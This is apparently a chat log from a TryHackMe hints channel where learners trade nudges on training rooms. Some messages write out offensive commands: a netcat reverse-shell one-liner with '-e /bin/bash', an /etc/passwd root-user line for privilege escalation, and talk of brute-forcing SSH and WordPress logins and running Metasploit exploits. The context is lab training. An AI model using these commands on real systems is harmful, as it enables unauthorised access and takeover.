#room-hints
i do use a few lol, but mostly manual :/
Try LinEnum.sh, don't search too much it's just one line, still related to what I said earlier
i was looking at that just now
When you create a volatility profile, does it have to be made on the target machine, or would another machine with an installation of that same OS and version suffice? If a different machine is acceptable, is it problematic to use a VM?
hello , for the nmap room, Task 3, I need to run a nmap or all the answers are possible without linux
I am doing this room: https://tryhackme.com/room/introtoresearch i have everything completed except question :
If a password hash starts with $6$, what format is it (Unix variant)?
I know that's sha512 but the format ... is it salt&encrypt? Tried all possible combinations but it keeps haunting me
@true gazelle https://askubuntu.com/questions/350208/what-does-2-dev-null-mean
@dusty pebble Anything else? Was /5 a mistake? (it stands for the space between flag 5)
@drowsy needle You're on the right track, but it's a specific subset with a longer name :)
@dense latch uh, it's a room about nmap -- you're gonna need to run it...
That said, there is a windows exe for it, but linux will serve you better in the long run
hello , for the nmap room, Task 3, I need to run a nmap or all the answers are possible without linux
@dense latch without linux you can use namp / zenmap (gui) on windows !
but yes you need to run it
But don't use WSL
alias nmap=nmap.exe 
I edited the message bc obviously i need to run it
^^'
yes, you need to run it
Don't shoot me , i promise i'll get better
I got a real one :C the emoji, not.. irl ;;, don't be confused
Life is much easier with a Linux VM (Kali/Parrot preferably)
I hope you don't have RL emojis
wsl networking isn't great and Windows sucks
When WSL2 is gonna be out officially, networking tools may work fine
May 2020? I am not sure.. it is still in insider builds for now
Or they may not. I'm not holding out hope.
niiice

I'm gonna repeat my question, because I think we got a little sidetracked.
When you create a volatility profile, does it have to be made on the target machine, or would another machine with an installation of that same OS and version suffice? If a different machine is acceptable, is it problematic to use a VM?
I'm gonna leave for a bit. Feel free to @ or PM me on this subject :)
Hmm, after running nmap my answer for the number of open ports under 1000 still wrong ...
just get the insider preview. its stable. well at least for me :p
@drowsy needle yes maybe, but i had way too many issues related to insiders build before.. also it's coming in May i believe so I am not worried
@true gazelle Specify the dir just after the find
IRRHOM====== can someone tell me encryption type ?
got it
@viral crane mind if I PM you? Maybe I did another PE for YOTR, it was very easy and I did not even use a script
Yeah sure!
@white pike I'd be interested to know if you've found an unintended
hi guys, linux challenges task4 #6
locate and retrieve flag26
i cant find flag 26 with find command, what can i do
@white salmon can you please give me a hint
Sorry @fossil cosmos I've not done that yet, if you bear with us though I'm sure somebody will have and will help as soon as they can.
Muirland gave me a hint yesterday but I couldn't figure it out. I'm stuck on the ssh pass part in madness
is the supposed solution linked with something else?
What do you mean chev?
pm?
@viral crane thanks for the tool ^^ i'll use it in the future. took me a while to actually understand the output of it
You are welcome!
Yeah, @inland onyx, wonderful room!
loved it
Any hint for Year of the Rabbit room? I'm stuck a feel hours. I'm not sure if I missed anything, first part
@solar sage The entire first part is very CTF
@solar sage what point are you at?
^^ good hint
@glossy basin inside xD
so you got shell?
ohh :)
@stuck fractal Honestly, even after the shell it's CTF. Privesc I suppose a bit more realistic
@solar sage Did you do the rooms I pointed you at?
Do some more Oracle's rooms and solve it
Yes @inland onyx
One of them will show you exactly what to do
so what's the problem then? it's pretty obvious after that
I probably missed something. I'll rest for a while and try again, thank you, guys!
I feel dumb , but cant find an answer for
this question: What is the name of the technique that "Search Engines" use to retrieve this information about websites? from googledorking room. I did all the question, and all of them are pretty easy.
I am sure that this one is very easy too, but I'm stuck. Tried few variants from google, and read the text 3-4 times but no luck
It's in there, read the thing again
ah, okay. Thanks
i feel really stupid asking this, but has anyone got any hints for https://tryhackme.com/room/zthlinux , the final challenge, i just can't seem to work out how to escalate to root
@fringe scroll Don't feel stupid for asking questions. Give me a moment to look at it.
Very last question, the Bonus Challenge?
First off, who are you currently logged in as? Just so I know the frame of reference.
(whoami)
@static kiln im in as shiba4 but can log in as shiba1-4 and noot
@fringe scroll Look for files belonging to each user. One should stand out.
is it the ll file in shiba4
If you need any more than a hint, please check my beloved write-up, then ask in #room-help
It is not
ah ok thanks ill take another look
@inland onyx thank you i've managed to find it, i was looking at your walkthrough, whats the purpose of -type f 2>>/dev/null , i get it eliminates some of the results but what are the conditions for that, apologies
@fringe scroll -type f Limits it to files
2>>/dev/null discards errors
Or more specifically, redirects errors (2) to /dev/null -- which you can think of as being the bottomless pit in Linux
Anything that goes in there ceases to exist
yea i did some searching and worked out what dev/null was and that was what confused me
thanks again i really appreciate it
Np
Hello friends, doing the Linux challenges room. I'm a little stuck on task 3 #6 - "flag 16 lies in another system mount". I've found proc/mounts but not sure if I'm on the right track. A little hint would be appreciated thanks
Got it nvm lok
:^) good job!
One of them will show you exactly what to do
@inland onyx I tried both, inside ssh and another shell. I think I'm missing something, I can't understand. I went through the steps 2-3 times to identify what I missed
@solar sage If you've done those rooms you'll see that one of them contains the exact process
It can be repeated inside the challenge room with the same results
Albeit a different binary to exploit
hey guys, can i get a hint on linux challenges task5 #5 Flag 33 is located where your personal $PATH's are stored.
cant find anything at the time
and hint would be really helpful
can i ask a question about rabbit?
is the privesc path something to do with ||SUID files?||

can i get a little nudge for rabbit?
You may
@inland onyx do you mind giving a hint for rabbit?
I can give you a nudge with it. DM with where you are with it, given it's only been out for a day
Is there a room that dives deeper into grep as the find room does? I obviously searched for 'grep' already
I'm trying to complete the Sudo Security Bypass but everytime I run the commands that are shows, I get a message that tells me that the current user is not allowed to execute sudo commands
@jaunty ember The syntax there is very exact. Try harder
Hey everyone in "WebAppSec 101" I had a problem about the Command Injection
@white salmon so a system mount is the act of associating a storage device to a particular location in the directory tree. Basically you're looking for another media device somewhere in the box
That being said, I have no idea how you're supposed to figure out flag17 in the same challenge
I have enumerated the system and found the binary that is supposed to be exploited to elevate my privs but "abnormal service" didn't understand that i guess
any hints
i gotta ask i hate asking this but is bruteforceing needed for theyearoftherabbit
@graceful sun what are you referring to?
@graceful sun shouldn't do?
@graceful sun You can dm me.
hey guys please help me in the cod caper room
i'm stuck at task5 question3
@mighty talon the SSH key doesn't work so it gives you alice's credentials to log in in her account, once done that you need to find in her directories for flag17
im in the Retro CTF (day 13 from advent cyber) i wanna know if i'm in the right path
i found the hidden directory on the web server and i'm trying to find either a file upload or a login page
otherwise i have no idea what to do
@stuck fractal any ideas?
sorry
tmux #7: what did our session name default to when we created one without name?
Try it and find out
i keep finding answers when i post here, w.e
@white salmon yeah, that one definitely falls under rule 13
ive been trying to find in google and that but forgot about doing it in the terminal lol
hello every one , im at Linux Challenge
Task 2 flag#6 , "
"Grep" through flag 6 and find the flag. The first 2 characters of the flag is c9.
"
i tried to run
||find / c9 | grep c9|| but nothing came out
You're searching for a file called c9 and then looking through those results for c9 @true gazelle
Is ||find / c9|| searching for the file (c9), and the grep command, as it says, greps c9? so i dont get where i got it wrong
i will try harder... if there is any more hints thank you 
i also get feedback from the terminal which says "find: 'c9': No such file or directory"
Hi everybody
i am solving mr.robot machine, i found flag-1 and then i am searching flag-2 , could you give me any hint? I am using|| wpscan|| tool and i am trying|| bruteforce to wps-login|| but nothing
@true gazelle that's not the name of the file
in yaroftherabbit i got the password list but none are working am i getting rolled again? lol
@graceful sun can confirm, one does work
ok thanks
Idk if you broke the formatting though
right thats what im thinking. i just did strings then copy paste
they all lined up just fine
there are tasks 4-6 after 3, @meager pebble
@glossy basin i mean are there any questions to answer or just some theory part
in where?
Bcoz I don't see any questions
Like in 3 there are 13
@meager pebble Refresh, fixed it. This wont occur from next week as we're changing our task functionality
@normal peak so what should i do know it says you have completed the room successfully
But i just did only 3 tasks
can you leave the room and re-join it please
Options in the top right, options -> leave room
In Brainstorm room, I get the chatserver.exe but cant run on Windows XP and Windows 7
What should I do
ohh I should have download the executable file on binary mode
any hints how to upgrade to root in year of the rabbit room
Take a look at some of my other rooms
hahahahahah i love this hint
Im having some difficulty on the base 2, binary (not octal - lol) question too. It's not obvious. I came across lb in a maths website but nothing I've read seems to work.
@rain heart The whole point of it is that it isn't obvious
It's designed to make you research
Hey can i search for files with specific permission with "find "? im very new to this stuff
There's a pretty good room on the find command
if i only want to search for everyone permission do i leave the first xx7 empty or something
not quite sure what do u think by that
lets assume a file has 775
permissions
i just to search the for the last permission which is for everyone
@inland onyx ty @solid patrol
if u want to get more familiar with find command there is good room about it
wow thanks
check https://blog.tryhackme.com/going-from-zero-to-hero/ for paths for rooms
it will help a lot
anyone do the bonus objective on the learn linux room got a lifeline to throw?
hi i am solving retro machine, could anyone give me any hint?
Hello, I'm currently on the ToolsRus room, and I'm having trouble exploiting the machine via metasploit
@silent linden Look for files belonging to each user
@stone meadow No idea where you're stuck at
@inland onyx for the bonus??
@empty nimbus What's the problem? (sounds more like a #room-help thing)
@silent linden Yes
@inland onyx ty
Is the exploit ||exploit/multi/http/tomcat_jsp_upload_bypass|| the right path or am I completely in the wrong direction ?
I don't have notes for that room, but I think you're looking for a different exploit
Because, I set up the RHOSTS, RPORT, LHOST and I still get a "Failed to upload the payload" when I try to run it
did u set LHOST to your tryhackme ip
Yes, it's the right IP
Okay, thank you @inland onyx, maybe I should look for arbitrary file uploads instead of RCE ?
Looks right
Yeah, it was another exploit
for retro I don't think I'm supposed to be || WPScanning the hidden directory right? ||
@inland onyx i found hidden directory
@inland onyx you sly rogue. Got it. I think THM has taught me more about semantics than it has about hacking (lol!)
i still have no idea where im going wrong hahahah
i hate wordpress
Should i use hydra or wpscan for wordpress bruteforce attack?
What is your suggestion?
hey guys
in question 12 from pentest questionnaire
can anyone give me a hint?
"You do it horizontally and laterally."
Think about what you might do once you've got initial access to a machine @lone abyss
@inland onyx Hey yo, could you give me hint about retro machine? I found ||retro ||directory and i am stuck here
@lone abyss That's the first thing you'd look to do after getting RCE?...
@inland onyx and i am performing|| bruteforce attack Wade,wade users and rockyou.txt for passwords.||
@stone meadow Then you've not enumerated enough. Keep looking -- first step should always be see what's on offer, before trying your own steps to break in
@inland onyx i found it bro ^^ i am in the dashboard but i don't like scenario because it is not realistic ^^
Correct, yes -- just deleting it to avoid the answer
@stone meadow You would be amazed at how often people do things like that...
@inland onyx are u serious?
Completely
The weakest link is always going to be the human link
That's frequently exaggerated for CTFs, that is true
But by and large, more often than not it's going to be human error that breaks something open
@inland onyx yes you are right
And given the number of people who still use "password" as their password? You can bet that there will be scenarios of people putting their password somewhere publicly accessible as a reminder
@inland onyx thank you man
I bet it's nootnoot2
:DD
guys im kinda stuck at advent of cyber task 7 mission 2 how im supposed to find the password?
Ive added new user by escalation to the 'passwd' file. Why is it enough without setting the password on the 'shadow' file?
hello, can some one give a little hint how to solve task 5 (about Jim secret answer) in OWASP Juice Shop room? thanks
Nm, thanks
anyone crack the hash on tony the tiger? Im having issues with it. Can someone dm me?
i got the pw list for yearoftherabbit but none are working can someone check my format
I don't recall there being any cracking in yearoftherabbit
FTP it says ftp
Then yeah, you're doing something wrong there
there was? I don't remember that..
i did strings and it looked fine it all lined up :/
oh, i remember the "bruteforce" part now
can someone check my format of the wordlist i was given to use, the format of it i heard that could be why its not working
Sure, Pm it :)
Thank you!
I have 3 images in the Tony room, none of which yield any steg or exif results. Is there a factor I'm missing?
How simple? Source-code simple?
simpler :p
where do i go from here ? doing this in sqlmap "--tables -D users" does not give me anything..
you gotta provide some context dude xD
On the actual page?
what room task and all that :)
@white salmon ah, no you were doing the right thing. Just do it real simple :3
Ah, now I'm thinking of cat
haha, that was a coincidence, but that.. might actually work
It'll be really confusing though...
Got it
Fair point...
;)
Babe we diiiiiid it
after few hours ofc
even got the password, how proud do i feel ? VERY proud
And you didn't even need help :p
@white salmon if you get a chance do you mind DMing me what you mean by Alice's key "didn't work". I've been trying to figure out .ssh and downloading her key and I've been kinda lost. :/
Ah, that explains why none of the walkthroughs explain why they just have her username and password.
Good to know.
It's in the task description..
Right, so is it broken in the sense that her private key permissions aren't set up properly? Or is it that the box is working incorrectly? That was my question. If its the fact that her permissions aren't set up properly that's the part I'm getting confused about. If the box is broken and it just gives you her username and password somewhere that's a different story.
Disregard, I just saw it.
Nothing like typing it all out so you can think it through so you can check if what you said was true :p
Yep, had to go back and read everything again lol. That's what I get for trying to move too fast through it.
Yeah, mine is a little pewter wizard that I scream at sometimes. Poor little guy.
hahaha
Any reason why port 8000 of the machine of WebGOAT is closed?
I would expect it to be open, in order to play around with it
VPN is working properly and I can ping the tomghost room, but all ports are filtered even using "sudo nmap -Pn -sC -sV -p- <boxip>"
I cant connect to Brainstorm any idea?
Remote system type is Windows_NT.
ftp> dir
501 Server cannot accept argument.
ftp: bind: Address already in use
In passive mode,
Connected to 10.10.20.113.
220 Microsoft FTP Service
Name (10.10.20.113:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
227 Entering Passive Mode (10,10,20,113,192,15).
Is it firewall issue?
Hi, hope you are all well. im having trouble with intro to python, is there anyone who can take a look at my code please?
I'm doing the Room tony the tiger the hint is : Tony's a pretty shy guy, he rarely takes photos of himself. So anything he posts must mean something! Does it mean i have to look for the flag inside the pictures on that site ?
task 4
I did exiftool, but no luck there
Even more basic
Gee-weez.. hmm interesting
so basic that it's actually a bit hard
I would call looking in the image info more basic, but it's not that
must be more basic!
does it mean i have to download the image, or is that more basic ?:D
you do have to download it, yes :p
I cant upload a shell, says there's no internet
@ornate narwhal lol in before it's just the image that needs to be looked at (like visually)
Ok, not that basic :3
You guys are confusing me even more
gimee some more basic tips
no more hints ? I was going so deep thinking about not basic, so now i cant get out of that depth. help me out
think about this: What's the most basic way it could hide in that file?
tbh, i never was that guy who looked info in the pic.. so imo the most basic way is to look in image info.
did try finding info in google image search, thought that was basic, but had no luck
do you look for info in other files, though? :)
also, i can't help but notice that you said "the" pic. Afaik there are 3 pictures x)
I have one of tony and another of of kellogs
wait.. there's a picture of the chicken?
i dont see it
no, that was a question
yeah, those were the two I got :3
And the answer is in one of those
There is another one lying around, but I haven't actually found a use for it
I thought you found a picture of Kellogg's other mascot by the same name
... wait.. that's tony as well?
.. no
.... oh
It's Kelloggs!
Common Linux Privesc Task 6 #3 ||I just change the command it gives me for [new] [123] copy paste it and it says its incorrect|| why?
@bitter crane
huh?
is that the picture i need to find ?
no
the one u posted
you have the right picture. It's one of those two
remember that discord probably scoffs the picture up so if you download it from discord, it may not give the right result
the pictures that i have are downloaded from the site itself
good good c:
but i cant think of the basics you guys are talking about
it's sometimes used on more complicated files, but it's a very basic approach nonetheless
@bitter crane you mean like compiling them ?
Right direction, but much simpler. Ever pulled data out of a binary?
@bitter crane no
then you've got your work cut out c: Figure out how to extract readable data from a binary and other files that aren't fully readable! :D
so i change jpg to sh ?
bonus task: Figure out what file extensions do :p
(and how little relevance they have in linux)
eh, it's all the same. it's just what people idiomatically do
Common Linux Privesc Task 6 #3 ||I just change the command it gives me for [new] [123] ||copy paste it and it says its incorrect why?
Doesn't mean Linux will treat it any differently
you guys went from basic to more confusion
well, send me a link of wiki that would help me to solve this task
Have you done the researching room yet @ornate narwhal
@inland onyx yes
forget about it, dont wanna waste too much time on it, will do it when i got more time. tell me other thing, when i try to connect to netcat, why does it connect and get back to my own shell ?
I use nc -lvp 4444 to start listening on my pc
and this in the run command on the website : nc 10.11.0.53 4444 -e /bin/bash
I get connection but it goes back to my own shell
This is for Tony?
What "run" command on the website?..
Ah, that makes more sense
Not a clue. I used a fifo myself
My guess is that it doesn't support -e
Not all versions of netcat do
What command did you use?
nc 10.11.0.53 4444 /bin/bash
Then you're not telling it to execute at all...
You need -e or -c
But they're only supported by some versions of netcat
Hence me using a fifo
same thing with -c
Then you're going to need to find another shell
Hello, i've been doing the blue round and successfully connected to the remote machine
and I found a flag but i have no idea how to download or open it :/
Do you know windows cmd? @left plank
more or less yeah
Then just use that to output the flag
okay
thank you
Tells me unable to initialize device PRN...
ok i got it Thank you
hi guys
i was wondering if i can get help with a room.
it is a beginners room about web fundamentals
it seems i cannot get the POST flag
basically i used: curl -X POST --data http://x.x.x.x /ctf/post
but whatever i put in after data seems to not work
any advice ?
Which task?
task5 mini CTF
the second one
POST task
i got the rest of them, but this one evades me. i know i am so close
I've done it but I can't remember it
Bear with me, I'll try to have a look.
Have you curl'd the address?
yes i did
Using terminal?
yes
i think i am missing after --data the right combination of characters...
i specified the folder also
but no effect
this is the hint i get: "cURL is probably the easiest way to do this, use -X POST and --data <whatever you want to send>"
cant get it to work
Just going back through it now, 2 secs.
I can't remember but I have the answer if you need it.
thank you but i must do it myself
thanks for your time also
how do i manually add a user to /etc/passwd? need it for privilege escalation
sudo useradd username
its in common linux privesc task 6 #4
did you use openssl passwd -1 -salt [salt] [password]
yes
already have that but dk what to do with it
sudo adduser new:password hash:0:0:root:/root:/bin/bash
and password hash is the long line of characters that start with $1$new
says user7 isn't in the sudoers file
can i dm u better? so we dont bother this chat
okay
im getting [+] Command executed successfully on tony the tiger but get no output.
Hey guys, could someone give me a hint about how to find the mcsysadmin's password for the 7th question of the Advent of Cyber's 9th task?
have you looked where linux stores every password? @dusky cosmos
Im not in the sudoers file. "/
have you looked if theres a backup of that folder in the system? @dusky cosmos
did it work?
Year of the Rabbit. Any small hints for getting a shell? (not asking for a direct spoiler, just a directional path. I tried too many things already) Thanks in advance
I did not focus on port 80 too much. Are you telling me to ?
Indeed I am
Thanks, hint taken
Is it just me or did the room just upgrade it self with a firewall
room ran out of time, i restarted it.. did a nmap again and now i cant get ports
Expires
So just give it some time
45m 04s
Oh you've already been waiting 15 minutes
ill restart it
nmap -sS -sC -sV 10.10.180.75
doing this without the --script vuln.. did that before.. so just wanted a quick re-review
It works now.
Will continue with the hint. Thanks
@white salmon I just need to be sure here. Are you telling me to look at the / get request? it looks pretty standard to my eyes. If not then i guess i gotta punch my head
@white salmon That thing
I love the occasional rick rolled videos here and there
@white salmon This might be where i need a second hint. "other things to look at". Do you mean a different URL (already did a dirbuster scan). Also i know that default installations do usually have some sort of "easy access thing going on". My knowledge about apache2 Debian is not that large. I tried googling about it, and the funny part is that i do remember watching some videos on Youtube about default apache2 pages during the final stage before sleep in my bed.
I dont want you to drop the bomb
Keep in mind this is a trolly room
So common things may have hidden secrets in them
That wouldn't be there usually
Thats my weakness im not good at trolly things
That's not really a weakness
You can't really get good at trolly things
You just have to be extra perceptive and check everything
I can tell you what i tried so far
Have you run a dirsearch
yes
And you've found the rickroll video
I got rick rolled
Your answer is in that folder
funny
So my initial wtf about that was true
oh wow
trolly it was
@white salmon I hope that the video dont start ... ever
its been loading for ages now.. maybe im lucky today!
@white salmon not really sure if Rick is a hint here haha
i did access the funny url
You went down a rabbit hole
Put it in spoiler tags
Mhm
Did you examine the get requests in burp
hey can I ask a question about the same room but at a different stage
Did you examine the get requests in burp
@white salmon
Don't spoil my beautiful Rick-rolls!
@white salmon question?
yeah! love your room btw, just wondering if I should focus on privesc to access stuff in ||gwendoline||
haven't had much luck with suid bins so far
There's a lateral privesc first
hmm, ok thanks
@white salmon I have a feeling that its ||directory traversal||
It's not
My feelings just went away
@inland onyx || Any hints for Eli's creds?||
||esoteric languages||
lol
been looking at the same get request several times.. and it strikes me..... what a funny looking ||/WExYY2Cv-qU/|| url
Indeed
so i suspect i gotta look again for more trolly things
funny feelings about ||stego || comes to me
@white salmon ||Lenna ||is an interesting person
Not sure where to go from this point... also this is my first CTF room ever with all this "funny & weird setups".
I have yet to see a ctf hide anything in ||style.css||
Yea it my first one. I usually pick rooms without CTF
(note ofc I wouldn't do that)
Pre-cise-ly
I did of course solve minor CTF stuff like flag.txt
cat it and yea..
recommendations on a good steg tool for Kali?
Impossible to recommend
Stego tools can be very specific
stegoveritas is probably the best "do it all" tool
But it doesn't pick up on everything created by every tool
The absolutely evil @inland onyx used a really obscure stego tool in one of his rooms
That no other tool would pick up on
So you just kinda have to work with it on a case by case
Remember this is hints @shrewd skiff -- see if you can work through it yourself, and ask if you get really stuck
oh yea.. i got carried away.. i will delete my other comment
That's OK
hmm, so I've spend the last hour looking at exploits for every suid binary on rabbit with no luck. Should I keep looking?
No, just read the message carefully
Thanks @feral kraken, can I ask, is it a reference to ||procmail||
omg thank you so much, how did I not think of this before
congrats on 10th place btw on the challenge leaderboard
@feral kraken what message are you talking about? I also can't seem to find a way to do privesc
@spark mason he was referring to the welcome message you get when you ssh into eli
*motd
Ooooh I thought you guys were talking about || privesc from gwendoline to root||
Can anyone point me in the right direction please - I'm currently doing 'find' command and I'm having difficulty with this " Find all files with write permission for the group "others", regardless of any other permissions, with extension ".sh" (use symbolic format)" I have so far ||find / -type f -perm /-w- -name "*.sh"||
@white salmon that, uh, isn't quite how that works
Oh?
It all looks good, other than the -perm argument
Ok, I'll re-read a bit.
I can see what you were thinking with that, and it was a good idea, but worth a re-read
@inland onyx || do i have to use CVE-2019-14287 in order to privesc to root? ||
That strikes me as a little more than a hint -- why not try it and see?
@inland onyx Can you give me another clue regarding that find command as I'm pulling out my hair, I've got it to ||-perm \g=w||
The backslash shouldn't be necessary (although you might need something there if I remember which question you're on)
@white salmon In the man page, search for ||-perm||
And I'm not sure about those letters
I'm on man now but it's not standing out, I'll try again
guys im having trouble with john
where do i put the salt
is it like this
salt:hash
or like this
hash:salt
How to know if firewall is been disabled?
@meager pebble firewall-config (If it is installed)
@ornate narwhal thanks
@royal jackal What room? Easier to understand what you mean by that
the last question from crackthehash room
@royal jackal Hashcat will do it
Yes but not being open to using multiple tools will be your downfall
u dont get it i was dared to do it in john
or challenged
actually
by my friend midnight commander
his not really my friend
i dont know him irl
but u get the idea
i told him yea its possible in john
and i dont want him to tell me
"I TOLD YOU SO"
i hate being told
"I TOLD YOU SO"
--format=hmac-sha1
yeah thats what im not finding
Google harder
i think john has poor documentation
@royal jackal Google harder, rule 13 http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
Bet you it's the same for hmac md5 and hmac sha1
ahhh it worked it really is the same as hmac md5
but how was i suppose to know that hmac-md5 applys to hmac sha1
¯\_(ツ)_/¯
things are just weird i guess
ahhh yes everything worked as planned thank you @stuck fractal

Can anyone tell me where I'm going wrong as I just can't seem to get it - find / -type f -perm g-w- -name ".sh I'm trying to Find all files with write permission for the group "others", regardless of any other permissions, with extension ".sh" (use symbolic format)
I've googled and man'd it and I just can't seem to get it for some reason.
Also, if you put your text in `here` then it won't mess your formatting up
Thank you @stuck fractal
Can someone give me a hint about the 13th question of the 2nd task of rp web scanning ("Finally, what if we'd like to use our plugins to run a series of standard tests against the target host?")?
Have you tried Google?
yes
It's not one I've yet done so can't help but I'm sure somebody will be able to comment.
@white salmon Privilege escalation on "year of the rabbit". Tried a little of this and that. This is my first CTF but I'm not giving up. I came this far. Any hints?
was that to me?
It was
Thanks, I'll look at it
Can anyone give me a hint on the reverse engineering room task 4? I've found the particular code related to the password in the crackme file and inputted what I thought the answer was but it still keeps shooting me down.
From the looks of the main function, it seems like it's looking at the ASCII value of local_2b (0x7a61), and then increasing that by 1 for each loop iteration and checking to see if it matches the first, second, then third character. But I've input 'abc' for the first three characters and it says incorrect answer. Driving me nuts that I can't interpret this correctly. Any hints?
Pastebin link to code I pulled from Ghidra https://pastebin.com/UVw7PNak
@jaunty bramble You sure there isn't a constant offset or something?
Hi, I might be stupid but I really don't know what it wants me to do at the end. "and if it's set equal to the current $USER environment variable."
I think I need to use "cat shiba2 | grep test1234 &&..."
Current $USER variable is "shiba2".
Thanks for your help/hint.
No @fiery orchid
Only thing you're doing is setting an environment variable called test1234
So with touch $test1234?
aha I see, with export $test1234
I mean you're on the right track
but I still don't get it completely... do I need to set $test1234 variable equal to the $USER variable? with export $test1234=$USER
Yes
Thanks got it
How do we start entering text into our new Vim document? - I'm thinking it's ||insert|| but that doesn't seem to be the case. I've looked online and everything.
I realise I'm going to kick myself but any hints?
@white salmon Yes you'll kick yourself
That question is so dumb
How do you enter text once you're in insert mode
Think smol brain
I love that question though
Just be very literal
Like what are you literally doing
Bugger me really...
Christ that's stupid.
@stuck fractal doesn't mean it isn't a dumb question
@white salmon can you stream this? I want to see... (and help)
well... if you were in insert mode... it would help you answer your own question :p
I can honestly say after completing the VIM room I've still no urge to use it.
I mean you're nearly right
@white salmon I'm sad... and sorry
Just a question... is nano supported on most (plain/newly installed) machines?
I can certainly see its uses, and parts of it I think are brilliant, but (yes, there is a but) I know it would drive me insane.
Yeah I think it is.
ok... well... vim normally isn't... but vi is (and sometimes vi is just an alias for vim)
tbf it's better than all the 'how do I exit vim' questions Stack Overflow has
History will remember nano as the victor!
so when I'm playing the Tony the Tiger box and I execute the exploit, I'm getting "exploit completed" but there is no output of my command...
nano wins and vi bites the dust
Emacs.
Do you wanna see the world burn @bitter crane
You should have seen the ytcracker stream
He went hard on my grammar
yeah, well, you're being corrected by a dyslexic, so I wouldn't be surprised :p
I haven't touched emacs and if it's anything like Vim I don't think I will be.
Nano FTW.
vim is awesome, however I understand it can be a challenge to get into. I'd recommend the guide on THM for vim https://tryhackme.com/room/toolboxvim
it'll help you get started with it
"challenging to get into" It's a program that's supposed to edit files
why make it that complicated
whoever made vim is probably regretting it
I believe the creator is referring to how complex it seems
why make it complex if it does something simple
I was a nano person before I registered for college
The nano army only grows!
no doubt
Hey everyone, I'm stuck at the amazing ccradare2 room. It is brilliant. Though I have to say I'm one of those that just bash my head against the final exam. I think I'm not missing much but can't find a way to "do it"... Do you have any advice please? Some reading to do or something. I tried decompiling with Cutter or ghidra, following registers, checking the ADD that @white salmon mentioned, yet I'm still stuck. Thanks
@white salmon do you know asm well?
Nope. I'm watching many YT videos of Live Overflow or r2, reading the re book and all, but I'm still at beginner level.
I'm guessing the important function is get_password, but what the instructions are doing, even decompiled, I can't understand it. I'll calm down and go through it line by line tomorrow on paper or something.
Yeah the radare room is just a debugger and tool to analyze asm
If you don't know asm you're gonna have some trouble with the crackme
YEES, I got it! I feel so stupid.
Your advice was all it took. Silly me
Thanks!
I'm gonna sleep sound
Good night
Thanks, you too!
TryHackMe is da best combination with HTB.
Hey, I'm doing the web fundamentals room and I'm doing the mini ctf. It tells me to do a post request "POST request. /ctf/post" so I'm trying to do `curl -X POST --data 'ctf/post ' 'http://10.10.98.48:8081/'`. I've tried many combinations like that. Any hints?
I'm not too familiar with cURL
can someone help me with ctfcollection>task21? the pcap one
I've done that before `curl -X POST --data ' ' 'http://10.10.98.48:8081/ctf/post'` but was greeted with this message and didn't know if it was intended "You need the right request body"
@true slate Check the task then -- it'll be telling you to send something specific
@inland onyx Thank you for showing me how big of an idiot I am. I guess I skipped over it, thanks for your help you saved me a massive headache
I remember having difficulty with that too, until I re-read it.
That's usually my problem: I know how to do something, I just jump the gun and try without reading everything
hi guys, I would be glad to get a little hint for Juice Shop forgot password for Jim.
I've tried to look for any injection possibilities on the form but couldn't find any.
I've already logged on as admin and as Jim and tried to find any details on the profile pages and all the network requests. Any idea or direction please?
@stuck fractal got it. Ghidra interpreted the hex to ASCII incorrectly and I stupidly believed it. Thanks for commenting and making me try again though.
I ended up installing Ghidra in my commando VM because I needed to anyway, and for some reason highlighting the hex values in the listing on Kali only showed 'z' whereas the Windows version showed 'za'
@keen tinsel from memory I think this challenge is OSINT. The challenge is finding his forgotten password question, right?
@white salmon
Yes the challenge is to find his answer to his question for Jim
I found it by the way, it was very tricky
||it's about finding the person in real life||
oh nice
Evening, guys. How can I find the request's sent data (of a DNS data exfiltration) using Wireshark?
(I already found the specific request that leaked the data)
@dusky cosmos There's something real suspicious about the request it made
any hint for task 4 of the new Tony the Tiger room?
I have no idea where to look for the flag
guys, port 8080 of the JBoss server has been closed in Tony the Tiger
Till yesterday it was open
hence I'm not able to use the exploit
pls help
@late lark Are you sure?
@late lark it takes a minute for the machine to load...that might have been the issue..
@late lark you can dm me.
hey guys, I am trying to solve https://tryhackme.com/room/rpnmap
but I am stuck at problem 4, task 3
nmap ||-sV or -A|| doesn't show the service number for this smh
similar problem with problem 5 in the same section
@frosty osprey it works for me with an ||-sV|| (started this room just to check your question)
I'd suggest redeploying the VM
Hey @peak girder thanks for checking it, but it's not working even after I restarted
here's the command:
||sudo nmap -sV -p 22 <IP>||
another thing: when I do a normal scan, ports 22 and 80 are open, but when I specify these ports, their states show up as filtered
yeah, your command works for me... what kind of output are you getting?
that's... kind of strange
could it be a problem with the nmap version? It's 7.8 on mine.
yeah I was just thinking that
but I'm also on 7.8
or no
I'm on 7.80
try and update?
yeah, I'll try that, thanks
(I'll bet you... it's gonna work after)
well @frosty osprey I did the room now as well... hadn't done it yet, hehe... Thanks for that
hey guys, anyone completed Tony the Tiger? I am stuck and I need some hints
@eager flax what's up?
Hello @inland onyx
I am really new here so I am doing my best to go the extra mile
where's the first flag?? hahahaha
I've checked source code, exif of images, burped and got another image, looked in every spot I could think of...
I'm also trying to "rockyou" the SSH but no luck so far...
Good start, and you're looking in the right place. But there's more to steganography than exif
I have no idea about stego
You don't need to go as far as using something like steghide
I'll look into it
But there might still be something hidden in those images
ok thx bud, I'll google for resources on steganography
Thanks for googling
In that case @eager flax you might want to think about paying @inland onyx
I will also take a handlers fee
I don't want any of this 'you'll get your fiver in the post' either...
anybody got a hint for wgel ctf?
@pseudo ermine where are you at with it?
enumeration for an hour now haha
doing it with a friend but both of us haven't really found anything
except the person who should update the server
so I tried to brute-force SSH with her name
but that would've been a bit too easy I guess :p
btw I did a nikto scan, nmap, nessus and dirbuster
Been ages since I did that one
the fact that OPTIONS is allowed drew my attention a bit
From memory it's got something to do with hidden directories on the website
haha it looked like a good challenge style
Double down on the dirbuster
okay, we'll try more there then
yeah there are write-ups
but then I'll see too much info probs :p
so I don't want to look at it yet haha
but if you redo it now by any chance, tips would be welcome hehe
@inland onyx my friend took a peek. You remembered right
@inland onyx regarding year of the rabbit. I looked at the other rooms you created with privilege escalation. I also looked up ||/usr/lib/pt_chown||, which I suspect can be exploited. So I found something on exploit-db and I tried it. From what I said, does this sound like the correct road?
@inland onyx Can you give me a hint towards the intended way? I tried the ||sudo & the buffer overflow escalation||. Did not work. I also tried other things, where the one I mentioned before was one of them.
